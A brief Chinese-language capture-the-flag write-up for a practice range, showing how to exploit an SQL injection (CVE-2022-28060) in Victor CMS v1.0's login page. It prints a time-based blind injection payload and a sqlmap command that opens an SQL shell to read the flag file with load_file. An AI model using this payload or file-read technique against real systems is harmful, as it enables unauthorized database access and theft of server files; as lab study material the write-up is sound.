春秋云境:CVE-2022-28060
文章合集:春秋云境系列靶场记录(合集)
关注WX:【小白SEC】查看更多内容……
Victor CMS v1.0 sql注入:CVE-2022-28060
漏洞介绍
Victor CMS v1.0 /includes/login.php 存在sql注入
解题步骤
-
访问URL,在登录过程中抓包:
-
探测存在SQL注入:
1'+AND+(SELECT*FROM+(SELECT+SLEEP(5))a)+AND+'1'='
-
使用Sqlmap获取flag,通过–sql-shell再传入load_file进行文件读取:
python sqlmap.py -r 1.txt --sql-shell -v
select load_file('/flag')
文章合集:春秋云境系列靶场记录(合集)